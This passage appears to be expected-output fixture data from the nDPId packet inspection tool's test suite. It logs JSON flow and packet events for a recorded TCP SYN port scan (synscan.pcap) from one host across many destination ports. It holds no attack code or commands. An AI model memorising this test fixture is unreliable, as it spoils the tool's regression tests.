+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":860,"source":"synscan.pcap","alias":"nDPId-test","flow_id":851,"flow_packet_id":1,"flow_last_seen":1278275059845,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059845,"pkt":"ACYLMQczACWzv5HuCABFAAAsJ+QAAC0G846sEAAIQA2GNIzTFlbdU4MZAAAAAGACCAAaNgAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":861,"source":"synscan.pcap","alias":"nDPId-test","flow_id":852,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059845,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":861,"source":"synscan.pcap","alias":"nDPId-test","flow_id":852,"flow_packet_id":1,"flow_last_seen":1278275059845,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059845,"pkt":"ACYLMQczACWzv5HuCABFAAAstxwAADEGYFasEAAIQA2GNIzTJxrdU4MZAAAAAGACCAAJcgAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":862,"source":"synscan.pcap","alias":"nDPId-test","flow_id":853,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059845,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49154,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":862,"source":"synscan.pcap","alias":"nDPId-test","flow_id":853,"flow_packet_id":1,"flow_last_seen":1278275059845,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059845,"pkt":"ACYLMQczACWzv5HuCABFAAAsWJwAADUGutasEAAIQA2GNIzTwALdU4MZAAAAAGACCABwiQAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":863,"source":"synscan.pcap","alias":"nDPId-test","flow_id":854,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059845,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":17988,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":863,"source":"synscan.pcap","alias":"nDPId-test","flow_id":854,"flow_packet_id":1,"flow_last_seen":1278275059845,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059845,"pkt":"ACYLMQczACWzv5HuCABFAAAspbMAADUGbb+sEAAIQA2GNIzTRkTdU4MZAAAAAGACCADqRwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":864,"source":"synscan.pcap","alias":"nDPId-test","flow_id":855,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059845,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3801,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":864,"source":"synscan.pcap","alias":"nDPId-test","flow_id":855,"flow_packet_id":1,"flow_last_seen":1278275059845,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059845,"pkt":"ACYLMQczACWzv5HuCABFAAAszIwAADAGS+asEAAIQA2GNIzTDtndU4MZAAAAAGACBAAlswAAAgQFtA=="} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":865,"source":"synscan.pcap","alias":"nDPId-test","flow_id":856,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059845,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":84,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":865,"source":"synscan.pcap","alias":"nDPId-test","flow_id":856,"flow_packet_id":1,"flow_last_seen":1278275059845,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059845,"pkt":"ACYLMQczACWzv5HuCABFAAAsOLAAADEG3sKsEAAIQA2GNIzTAFTdU4MZAAAAAGACCAAwOAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":866,"source":"synscan.pcap","alias":"nDPId-test","flow_id":857,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059845,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3878,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":866,"source":"synscan.pcap","alias":"nDPId-test","flow_id":857,"flow_packet_id":1,"flow_last_seen":1278275059845,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059845,"pkt":"ACYLMQczACWzv5HuCABFAAAs7mkAADAGKgmsEAAIQA2GNIzTDybdU4MZAAAAAGACBAAlZgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":867,"source":"synscan.pcap","alias":"nDPId-test","flow_id":858,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059845,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9485,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":867,"source":"synscan.pcap","alias":"nDPId-test","flow_id":858,"flow_packet_id":1,"flow_last_seen":1278275059845,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059845,"pkt":"ACYLMQczACWzv5HuCABFAAAs2sEAAC4GP7GsEAAIQA2GNIzTJQ3dU4MZAAAAAGACDAAHfwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":868,"source":"synscan.pcap","alias":"nDPId-test","flow_id":859,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059845,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9999,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":868,"source":"synscan.pcap","alias":"nDPId-test","flow_id":859,"flow_packet_id":1,"flow_last_seen":1278275059845,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059845,"pkt":"ACYLMQczACWzv5HuCABFAAAsGVoAACcGCBmsEAAIQA2GNIzTJw\/dU4MZAAAAAGACEAABfQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":869,"source":"synscan.pcap","alias":"nDPId-test","flow_id":860,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059845,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5566,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":869,"source":"synscan.pcap","alias":"nDPId-test","flow_id":860,"flow_packet_id":1,"flow_last_seen":1278275059845,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059845,"pkt":"ACYLMQczACWzv5HuCABFAAAsCYIAADoGBPGsEAAIQA2GNIzTFb7dU4MZAAAAAGACDAAWzgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":870,"source":"synscan.pcap","alias":"nDPId-test","flow_id":861,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059846,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5510,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":870,"source":"synscan.pcap","alias":"nDPId-test","flow_id":861,"flow_packet_id":1,"flow_last_seen":1278275059846,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059846,"pkt":"ACYLMQczACWzv5HuCABFAAAsr3QAADgGYP6sEAAIQA2GNIzTFYbdU4MZAAAAAGACBAAfBgAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":871,"source":"synscan.pcap","alias":"nDPId-test","flow_id":862,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059846,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49156,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":871,"source":"synscan.pcap","alias":"nDPId-test","flow_id":862,"flow_packet_id":1,"flow_last_seen":1278275059846,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059846,"pkt":"ACYLMQczACWzv5HuCABFAAAsZqgAADEGsMqsEAAIQA2GNIzTwATdU4MZAAAAAGACCABwhwAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":872,"source":"synscan.pcap","alias":"nDPId-test","flow_id":863,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059846,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32779,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":872,"source":"synscan.pcap","alias":"nDPId-test","flow_id":863,"flow_packet_id":1,"flow_last_seen":1278275059846,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059846,"pkt":"ACYLMQczACWzv5HuCABFAAAsBTkAADYGDTqsEAAIQA2GNIzTgAvdU4MZAAAAAGACDACsgAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":873,"source":"synscan.pcap","alias":"nDPId-test","flow_id":864,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059846,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1029,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":873,"source":"synscan.pcap","alias":"nDPId-test","flow_id":864,"flow_packet_id":1,"flow_last_seen":1278275059846,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059846,"pkt":"ACYLMQczACWzv5HuCABFAAAsZFYAAC4GthysEAAIQA2GNIzSBAXdUoMYAAAAAGACDAAoigAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":874,"source":"synscan.pcap","alias":"nDPId-test","flow_id":865,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059846,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1864,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":874,"source":"synscan.pcap","alias":"nDPId-test","flow_id":865,"flow_packet_id":1,"flow_last_seen":1278275059846,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059846,"pkt":"ACYLMQczACWzv5HuCABFAAAsbxoAACUGtFisEAAIQA2GNIzSB0jdUoMYAAAAAGACCAApRwAAAgQFtA=="} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":875,"source":"synscan.pcap","alias":"nDPId-test","flow_id":866,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059846,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":901,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":875,"source":"synscan.pcap","alias":"nDPId-test","flow_id":866,"flow_packet_id":1,"flow_last_seen":1278275059846,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059846,"pkt":"ACYLMQczACWzv5HuCABFAAAsjUUAACwGjy2sEAAIQA2GNIzSA4XdUoMYAAAAAGACBAAxCgAAAgQFtA=="} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":876,"source":"synscan.pcap","alias":"nDPId-test","flow_id":867,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059846,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":981,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":876,"source":"synscan.pcap","alias":"nDPId-test","flow_id":867,"flow_packet_id":1,"flow_last_seen":1278275059846,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059846,"pkt":"ACYLMQczACWzv5HuCABFAAAsMeAAACgG7pKsEAAIQA2GNIzSA9XdUoMYAAAAAGACBAAwugAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":877,"source":"synscan.pcap","alias":"nDPId-test","flow_id":868,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059846,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5560,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":877,"source":"synscan.pcap","alias":"nDPId-test","flow_id":868,"flow_packet_id":1,"flow_last_seen":1278275059846,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059846,"pkt":"ACYLMQczACWzv5HuCABFAAAsvrcAADgGUbusEAAIQA2GNIzSFbjdUoMYAAAAAGACBAAe1wAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":878,"source":"synscan.pcap","alias":"nDPId-test","flow_id":869,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059846,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3007,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":878,"source":"synscan.pcap","alias":"nDPId-test","flow_id":869,"flow_packet_id":1,"flow_last_seen":1278275059846,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059846,"pkt":"ACYLMQczACWzv5HuCABFAAAszmQAAC4GTA6sEAAIQA2GNIzSC7\/dUoMYAAAAAGACDAAg0AAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":879,"source":"synscan.pcap","alias":"nDPId-test","flow_id":870,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059846,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1119,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":879,"source":"synscan.pcap","alias":"nDPId-test","flow_id":870,"flow_packet_id":1,"flow_last_seen":1278275059846,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059846,"pkt":"ACYLMQczACWzv5HuCABFAAAswF0AACkGXxWsEAAIQA2GNIzSBF\/dUoMYAAAAAGACCAAsMAAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":880,"source":"synscan.pcap","alias":"nDPId-test","flow_id":871,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059846,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":55555,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":880,"source":"synscan.pcap","alias":"nDPId-test","flow_id":871,"flow_packet_id":1,"flow_last_seen":1278275059846,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059846,"pkt":"ACYLMQczACWzv5HuCABFAAAsVtQAADQGvZ6sEAAIQA2GNIzS2QPdUoMYAAAAAGACBABbiwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":881,"source":"synscan.pcap","alias":"nDPId-test","flow_id":872,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059846,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3766,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":881,"source":"synscan.pcap","alias":"nDPId-test","flow_id":872,"flow_packet_id":1,"flow_last_seen":1278275059846,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059846,"pkt":"ACYLMQczACWzv5HuCABFAAAsEBMAADUGA2CsEAAIQA2GNIzSDrbdUoMYAAAAAGACCAAh2QAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":882,"source":"synscan.pcap","alias":"nDPId-test","flow_id":873,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059846,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1600,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":882,"source":"synscan.pcap","alias":"nDPId-test","flow_id":873,"flow_packet_id":1,"flow_last_seen":1278275059846,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059846,"pkt":"ACYLMQczACWzv5HuCABFAAAsXHsAADYGtfesEAAIQA2GNIzSBkDdUoMYAAAAAGACDAAmTwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":883,"source":"synscan.pcap","alias":"nDPId-test","flow_id":874,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059846,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1192,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":883,"source":"synscan.pcap","alias":"nDPId-test","flow_id":874,"flow_packet_id":1,"flow_last_seen":1278275059846,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059846,"pkt":"ACYLMQczACWzv5HuCABFAAAs5n4AACgGOfSsEAAIQA2GNIzSBKjdUoMYAAAAAGACBAAv5wAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":884,"source":"synscan.pcap","alias":"nDPId-test","flow_id":875,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059846,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":12174,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":884,"source":"synscan.pcap","alias":"nDPId-test","flow_id":875,"flow_packet_id":1,"flow_last_seen":1278275059846,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059846,"pkt":"ACYLMQczACWzv5HuCABFAAAs2vsAADIGO3esEAAIQA2GNIzSL47dUoMYAAAAAGACDAD9AAAAAgQFtA=="} 